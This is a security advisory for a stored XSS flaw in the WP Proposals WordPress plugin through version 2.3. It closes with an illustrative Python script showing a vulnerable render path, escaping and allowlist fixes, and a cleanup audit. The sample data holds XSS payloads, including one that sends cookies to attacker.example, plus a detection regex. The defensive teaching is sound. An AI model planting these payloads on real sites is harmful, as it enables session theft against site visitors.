Impact
The vulnerability is a stored cross-site scripting (XSS) flaw in the WP Codeus WP Proposals plugin for WordPress. Because user-supplied input is not properly neutralized during web page generation, an attacker can inject script markup that is saved as part of a proposal's content. Whenever a visitor views the stored proposal, the injected code runs in that visitor's browser within the site's origin, which can enable theft of session cookies, defacement, or other client-side attacks against that user. The weakness is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation) and carries a CVSS score of 5.9, a medium-severity rating.
Affected Systems
All installations of the WP Proposals plugin up to and including version 2.3 are affected. The flaw is present in every build from the earliest release through 2.3, so any WordPress site running WP Codeus WP Proposals at one of those versions is vulnerable. Only versions later than 2.3 are outside the reported affected range; site owners should confirm their installed version rather than assume an older install is safe.
Risk and Exploitability
The EPSS score is below 1 %, suggesting a low probability of exploitation at present, and the vulnerability is not listed in the CISA KEV catalogue. Exploitation requires the ability to submit or edit proposal content, which may be limited to authenticated users or administrators. If the plugin accepts proposal content from lower-privileged or untrusted authors, however, an attacker needs nothing more than an ordinary form submission to plant a payload that then persists and fires in the browser of every user who later opens the proposal, including administrators. Because the victim only has to view the page, and because the persisted payload keeps working until the content is cleaned up, the overall risk is moderate and warrants timely remediation even though the current exploitation likelihood appears low.
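To make the CWE-79 pattern in the Impact section and the clean-up point in this section concrete, the following Python script is an added illustration, not code from the WP Proposals plugin or from WP Codeus. It contrasts a render path that concatenates stored content straight into HTML with two fixes: escaping at output time for plain-text fields (the role WordPress's esc_html() plays) and an allowlist sanitizer for rich-text fields (the role wp_kses_post() plays). It also includes a small audit that flags already-stored rows carrying script-bearing markup, because patching the plugin does not remove payloads that were saved before the patch. The proposal rows, tag allowlist, and attacker URL are constructed for the example.

```python
"""Stored XSS in proposal-style content: vulnerable render, two fixes, and an audit.

Added example; not the plugin's code. All sample data below is constructed.
"""
import html
import re
from html.parser import HTMLParser

# Constructed rows standing in for proposals already saved in the database.
STORED_PROPOSALS = [
    {"id": 1, "body": "Roof repair quote for <b>Q3</b>, total $4,200."},
    {"id": 2, "body": 'Thanks!<script>fetch("https://attacker.example/?c="+document.cookie)</script>'},
    {"id": 3, "body": '<img src=x onerror="alert(document.domain)">Site visit photos'},
    {"id": 4, "body": '<a href="javascript:alert(1)">View attachment</a>'},
]


def render_unsafe(body: str) -> str:
    """Vulnerable pattern (CWE-79): stored text is dropped into the page unchanged."""
    return f"<div class='proposal'>{body}</div>"


def render_escaped(body: str) -> str:
    """Fix for plain-text fields: escape at output time (what esc_html() does in WordPress)."""
    return f"<div class='proposal'>{html.escape(body, quote=True)}</div>"


# Allowlist for rich-text proposal bodies (hypothetical policy for this example).
ALLOWED_TAGS = {"b", "i", "em", "strong", "p", "br", "ul", "ol", "li", "a"}
ALLOWED_ATTRS = {"a": {"href"}}
SAFE_URL = re.compile(r"^(https?:|mailto:|/|#)", re.IGNORECASE)


class AllowlistSanitizer(HTMLParser):
    """Rebuilds markup keeping only allowlisted tags and attributes (the wp_kses_post() idea).

    Unknown tags are dropped but their text is kept; <script>/<style> bodies are dropped
    entirely; event-handler attributes never pass the allowlist; href must be a safe scheme.
    """

    def __init__(self) -> None:
        super().__init__(convert_charrefs=True)
        self.out: list[str] = []
        self._skip_depth = 0  # > 0 while inside <script> or <style>

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self._skip_depth += 1
            return
        if tag not in ALLOWED_TAGS:
            return  # e.g. <img ... onerror=...> disappears, its text stays
        kept = []
        for name, value in attrs:
            if name in ALLOWED_ATTRS.get(tag, set()) and value is not None:
                if name == "href" and not SAFE_URL.match(value.strip()):
                    continue  # blocks javascript: and data: URLs
                kept.append(f' {name}="{html.escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in ("script", "style"):
            self._skip_depth = max(0, self._skip_depth - 1)
            return
        if tag in ALLOWED_TAGS and tag != "br":
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if self._skip_depth == 0:
            self.out.append(html.escape(data, quote=False))


def sanitize(body: str) -> str:
    """Fix for rich-text fields: allowlist-sanitize before storing (or before rendering)."""
    parser = AllowlistSanitizer()
    parser.feed(body)
    parser.close()
    return "".join(parser.out)


# Coarse indicator pattern for triage of existing rows; not a substitute for sanitizing.
DANGEROUS = re.compile(r"<\s*(script|iframe|object|embed)\b|\bon[a-z]+\s*=|javascript\s*:", re.IGNORECASE)


def audit_stored(rows) -> list[int]:
    """Return ids of stored proposals that carry script-bearing markup and need clean-up."""
    return [row["id"] for row in rows if DANGEROUS.search(row["body"])]


if __name__ == "__main__":
    for row in STORED_PROPOSALS:
        print(row["id"], "unsafe  :", render_unsafe(row["body"]))
        print(row["id"], "escaped :", render_escaped(row["body"]))
        print(row["id"], "sanitized:", sanitize(row["body"]))
    print("rows needing clean-up:", audit_stored(STORED_PROPOSALS))
```

Which fix applies depends on what a field is for: a title or customer name should be escaped at output with no markup allowed, while a rich-text body needs an allowlist sanitizer, and escaping the whole body would break the legitimate `<b>` in row 1. The audit regex is deliberately coarse; its job is to find rows to review after upgrading past 2.3, not to decide what is safe.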